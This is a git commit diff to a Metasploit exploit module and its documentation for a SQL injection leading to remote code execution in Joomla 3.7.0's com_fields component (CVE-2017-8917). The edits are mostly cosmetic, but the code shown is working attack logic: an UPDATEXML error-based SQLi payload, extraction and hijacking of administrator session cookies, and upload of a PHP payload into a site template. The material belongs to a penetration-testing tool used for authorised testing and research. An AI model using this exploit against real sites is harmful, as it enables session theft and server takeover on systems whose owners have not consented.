Changes suggested by h00die

2018-03-08 20:13:01 -05:00 · 2018-03-08 20:13:01 -05:00 · 048d0d1fe4
parent 05a653b853
commit 048d0d1fe4
2 changed files with 14 additions and 15 deletions
--- a/documentation/modules/exploit/unix/webapp/joomla_sqli_rce_3_7_0.md
+++ b/documentation/modules/exploit/unix/webapp/joomla_sqli_rce_3_7_0.md
@ -1,7 +1,7 @@
 ## Vulnerable Application

-  This module exploits a sql injection in the core of Joomla 3.7.0.
-  This vulnerability can allow remote code execution.
+  This module exploits a SQL Injection vulnerability in the com_fields component which was introduced to the core of Joomla in version 3.7.0.
+  With the SQLi, its possible to enumerate cookies of administrative users, and hijack one of their sessions. If no administrators are authenticated, the RCE portion will not work. If a session hijack is available, one of the website templates is identified, and our payload is added to the template as a new file, and then executed.

 ## Verification

@ -15,7 +15,7 @@

 ## Scenarios

-### Joomal 3.7.0 and an administrator must be authenticated in the backend
+### Joomal 3.7.0 on Ubuntu 16.04 with another user authenticated as an administrator

 ```
 msf > use exploit/unix/webapp/joomla_comfields_sqli_rce 
--- a/modules/exploits/unix/webapp/joomla_comfields_sqli_rce.rb
+++ b/modules/exploits/unix/webapp/joomla_comfields_sqli_rce.rb
@ -11,7 +11,7 @@ class MetasploitModule < Msf::Exploit::Remote

  def initialize(info={})
    super(update_info(info,
-      'Name'           => "Joomla Component Fields SQLi Remote Code Execution",
+      'Name'           => 'Joomla Component Fields SQLi Remote Code Execution',
      'Description'    => %q{
        This module exploits a SQL injection vulnerability found in Joomla versions
        3.7.0.
@ -25,6 +25,7 @@ class MetasploitModule < Msf::Exploit::Remote
      'References'     =>
        [
          [ 'CVE', '2017-8917' ], # SQLi
+          ['EDB', '42033'],
          [ 'URL', 'https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html' ]
        ],
      'Payload'        =>
@ -38,10 +39,10 @@ class MetasploitModule < Msf::Exploit::Remote
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
-          [ 'Joomla 3.7.0 ', {} ]
+          [ 'Joomla 3.7.0', {} ]
        ],
      'Privileged'     => false,
-      'DisclosureDate' => "May 17 2017",
+      'DisclosureDate' => 'May 17 2017',
      'DefaultTarget'  => 0))

      register_options(
@ -68,9 +69,8 @@ class MetasploitModule < Msf::Exploit::Remote
  def sqli( tableprefix , option)

    # SQLi will only grab Super User sessions with a valid username and userid (else they are not logged in).
-    # The extra search for NOT LIKE '%IS NOT NULL%' is because of our SQL data that's inserted in the session cookie history.
+    # The extra search for userid!=0 is because of our SQL data that's inserted in the session cookie history.
    # This way we make sure that's excluded and we only get real admin sessions.
-    
    if option == 'check'
      sql = "(UPDATEXML(2170,CONCAT(0x2e,0x7170716a71,(SELECT MID((IFNULL(CAST(TO_BASE64(table_name) AS CHAR),0x20)),1,22) FROM information_schema.tables order by update_time DESC LIMIT 1),0x7171717171),4879))"
    else
@ -88,7 +88,6 @@ class MetasploitModule < Msf::Exploit::Remote
        }
      })

-  
    return res

  end
@ -110,7 +109,7 @@ class MetasploitModule < Msf::Exploit::Remote

    # Retrieve the admin session using our retrieved table prefix
    res = sqli("#{table_prefix}_", 'exploit')
-    
+
    if res && res.code == 500 && res.body =~ /qqq(.*)qqq/
      auth_cookie_part = $1
      print_status("#{peer} - Retrieved admin cookie [ #{auth_cookie_part} ]")
@ -133,14 +132,14 @@ class MetasploitModule < Msf::Exploit::Remote

    # Modify cookie to authenticated admin
    auth_cookie = cookie_begin
-    auth_cookie << "="
+    auth_cookie << '='
    auth_cookie << auth_cookie_part
-    auth_cookie << ";"
+    auth_cookie << ';'

    # Authenticated session
    res = send_request_cgi({
      'method'   => 'GET',
-      'uri'      => normalize_uri(target_uri.path, "administrator", "index.php"),
+      'uri'      => normalize_uri(target_uri.path, 'administrator', 'index.php'),
      'cookie'  => auth_cookie
      })

@ -154,7 +153,7 @@ class MetasploitModule < Msf::Exploit::Remote
    # Retrieve template view
    res = send_request_cgi({
      'method'   => 'GET',
-      'uri'      => normalize_uri(target_uri.path, "administrator", "index.php"),
+      'uri'      => normalize_uri(target_uri.path, 'administrator', 'index.php'),
      'cookie'  => auth_cookie,
      'vars_get' => {
        'option' => 'com_templates',
@ -183,7 +182,7 @@ class MetasploitModule < Msf::Exploit::Remote
    print_status("#{peer} - Creating file [ #{filename}.php ]")
    res = send_request_cgi({
      'method'   => 'POST',
-      'uri'      => normalize_uri(target_uri.path, "administrator", "index.php"),
+      'uri'      => normalize_uri(target_uri.path, 'administrator', 'index.php'),
      'cookie'  => auth_cookie,
      'vars_get' => {
        'option' => 'com_templates',